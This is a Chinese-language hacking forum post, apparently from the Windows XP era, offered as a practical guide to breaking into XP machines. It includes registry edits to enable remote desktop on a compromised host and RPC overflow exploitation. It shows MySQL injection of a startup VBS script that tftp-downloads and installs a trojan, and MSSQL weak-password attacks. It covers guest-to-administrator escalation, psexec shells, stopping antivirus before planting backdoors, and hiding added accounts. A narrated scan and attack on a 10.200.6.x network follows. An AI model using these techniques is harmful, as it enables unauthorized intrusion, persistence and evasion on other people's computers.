regedit4 (一定要大写)
[hkey_local_machine\system\currentcontrolset\control\terminal serve]
"fdenytsconnections"=dword:00000000
假如把上面的注册表文件存为3389.reg,把3389.reg上传到肉机执行regedit /s 3389.reg
,这样就可以远程连接了。
第四:如果你想像2000那样映射XP的共享硬盘,要通过修改对方的本地安全策略。在【可匿名访问的工享】中添加上c$,d$..等。
第五:xp中的仿真终端服务启动后默认为ntlm验证,可以用xp自带的tlntadmn(net start 只能在本地启动仿真终端服务)命令开启远程主机的telnet,而shutdown命令可以关闭远程主机,sc命令也以配置远程服务......,这些是xp自带的小工具 .
第六:另外XP自带的自动更新和防火墙也为XP增强了一些安全保护。
【本地安全策略】-【用户权利指派】-【从网络访问此计算机】中入"guest"用户。这样你就能在本地【运行】中输入
ip 浏览对方共享目录了。
【本地安全策略】-【用户权利指派】-【拒绝从网络访问此计算机】中删除"guest"用户。
接着介绍一些入侵XP的方法:
当然溢出还是绝对的主角,他的好处是可以得到"cmdshell"。缺点就是成功率不太高,要有耐心。
对没打补丁的XPsp1来说MS04011,MS03049漏洞还是很多的(ms05039主要这对的是2000)。直接溢出,不用在本地开端口,溢出成功后用telnet直接登陆就行了。
还有就是扫描135端口,看有没有rpc溢出,这是比较流行的。工具网上又很多自己去搜吧。
最后是利用数据库入侵。经典的是mysql和mssql。前者我没试过所以找了些资料大家看看吧:
mysql入侵
工具:wineggdropshell v1.35
[1]用mysql连接你拥有用户名和密码的远程mysql数库.
[2]新建一个数据表后,安格式把下面两行语句写到新建的数据表中假如你新建的数据表为aa,
(1)insert into aa values ("set wshshell=createobject (""wscript.shell"")");
(2)insert into aa values ("a=wshshell.run (""cmd.exe /c (tftp -i 127.0.0.1 get win135.exe c:\\windows\\system32\\win135.exe && c:\\windows\\system32\\win135.exe -install) && (net start win135)"",0)");
[3]把新建的数据表为脚本文件并导出到启动项:
select * from aa into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\aa.vbs";
[4]保存成功后,只要对方重启你就可以用木马登陆了
mssql,呵呵不多说了相信大家都听说过了:
首先扫描1433端口开放的主机,然后用x-scan中扫描mssql弱口令 。 再用sqlexec连接带有弱口令的主机 ,接着用tftp上传木马 ,用木马的system权限登陆后,再上传3389.reg开他的远程终端。用3389登陆后.别忘了册掉新建的用户,因为xp登陆对话框中会把新建的用户显示出来.除非你是用的内置帐户,或克隆的内置账户。
这就是我入侵XP的一些经验。希望可以为大家提供一些参考。
更新:不要指望在XP上开3389了,虽然可以通过注册表开启远程桌面连接。但是XP只允许一个用户在同一时间登陆。没办法更改。网上传说的修改注册表的方法:
HKEY_LOCAL_MA-CHINE\System\CurrentControlSet\Control\Terminal Server\Licensing Core 分支,新建一个名为“EnableConcurrentSessions”的DWORD值,将键值设置为“1”,就可以让Windows XP支持两个用户。
只针对XP测试版,该版本目前已经快绝迹了。除非把测试版的3389文件替换掉XP SP2的文件才能成功。
1.思路:突破xp系统远程访问的限制,实现文件传输和远程登陆。
2.工具:rpc漏洞扫描工具、溢出工具,pstools工具包。
3.步骤
1)步骤一:rpc漏洞扫描:
推荐使用retinarpcdcom.exe(eeye公司推出的专门针对RPC漏洞的扫描工具)
图形界面,在剑鹰网络安全小组有下载。
2)步骤二:远程溢出:
在剑鹰网络安全小组有很多该类工具下载,我用xp.exe,溢出成功率极高。
3)步骤三:提升guest权限(本方案之关键):
命令:net user guest /active:yes
net localgroup aministrators guest /add
——————————————————————————————
看到这里,也许你会嗤之以鼻,
可这正是大家忽略的地方,因为guest有与其它所有帐号不同的特性。
如果你用net user guest命令,将会看到下面的内容:
Password required No
这正是突破xp系统远程访问帐号限制的突破口!
除了guest外,其它帐号都是
Password required yes
所以就算你有xp系统的管理员帐号密码一样无所作为。
——————————————————————————————
当guest提升为admin权限后,你试试
dir \\IP\c$
呵呵,现在你已经有了读写权限,连ipc$连接都省了~~
当然你也一样可以用net use \\ip "" /user:"guest"来进行IPC$连接
(不过是多此一举)。
到此,文件传输的问题已经解决!
4)步骤四:远程登陆
我们当然不想每次用溢出登陆对方。
那么就试试opentelnet吧
>opentelnet \\ip guest "" 1 90
read ntlm failed \\shit!用administrator也是这样子。
上传srv.exe试试,我没试过,有兴趣的自己试试。
因为我认为用psexec方便多了。命令如下:
psexec \\ip cmd (连ipc$不用开了,爽吧)
5)关于后门:
各显神通,我正好用来试试榕哥的bits.dll,感觉一点都不好,
榕哥的fans可别拿鸡蛋扔我哦~~
6)注意事项:
千万别在xp系统中建新帐户(为什么?自己想想)
xp系统默认只能登陆一个帐户,故用3389的远程登陆是不行的。
rpc溢出会导致对方重启,要慎用,尤其是服务器。
由于当时只是粗略的看了看,自己没去试验文章里的方法,今天有时间了就测试一下。
我在内网的,所以就在内网里测试吧,首先用superscan扫了一个网段。
10.200.6.1——10.200.6.254,看看那些机子开放了 5000端口。
一般情况下这样的机子都是XP系统。好了,速度很快,出来一大片。
然后我用RPC的溢出工具,打开,填入一个机子的IP地址,失败,可能人家已经打了补丁
没关系,我们继续来,终于有一个成功了
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
为了保险一点,我先个机子安装一个后门再说,传个文件过去,这个方法很多。
TFTP,FTP,在命令行用脚本或者http下载都可以实现。
这个需要考虑对方有没有开杀毒软件,如果有的话先传个pulist.exe以及pslist.exe过去
先把杀毒软件的服务停止,然后杀掉进程,这时再传木马过去。
好了,我们先看看对方的用户信息
C:\WINDOWS\system32>net user
net user
\\ 的用户帐户
-----------------------------------------------------------------
Administrator Guest HelpAssistant
SUPPORT_388945a0
命令运行完毕,但发生一个或多个错误。
然后我们把guest激活并加入管理员组。
C:\WINDOWS\system32>net user guest /active:yes
net user guest /active:yes
命令成功完成。
C:\WINDOWS\system32>net localgroup administrators guest /add
net localgroup administrators guest /add
命令成功完成。
我们来看看guest的帐户信息
net user guest
用户名 Guest
全名
注释 供来宾访问计算机或访问域的内置帐户
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2003/11/28 下午 02:48
密码到期 从不
密码可更改 2003/11/28 下午 02:48
需要密码 No
用户可以更改密码 No
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Administrators *Guests
全局组成员 *None
命令成功完成。
看看对方开的共享
C:\WINDOWS\system32>net share
net share
共享名 资源 注释
------------------------------------------------------------
IPC$ 远程 IPC
G$ G:\ 默认共享
F$ F:\ 默认共享
ADMIN$ C:\WINDOWS 远程管理
C$ C:\ 默认共享
E$ E:\ 默认共享
命令成功完成。
然后按照文章里的方法进行,以下是在我机子里操作的
C:\>dir \\10.200.6.183\c$
登录失败: 未授予用户在此计算机上的请求登录类型。
C:\>net use \\10.200.6.183\ipc$ "" /user:guest
系统发生 1385 错误。登录失败: 未授予用户在此计算机上的请求登录类型。
晕了,不知道为什么,重新在对方的shell里给guest设置了一个密码之后再看看
C:\>net use \\10.200.6.183\ipc$ "123456" /user:guest
系统发生 1385 错误。
登录失败: 未授予用户在此计算机上的请求登录类型。
用psexec \\10.200.6.183 cmd.exe 也不行~!!!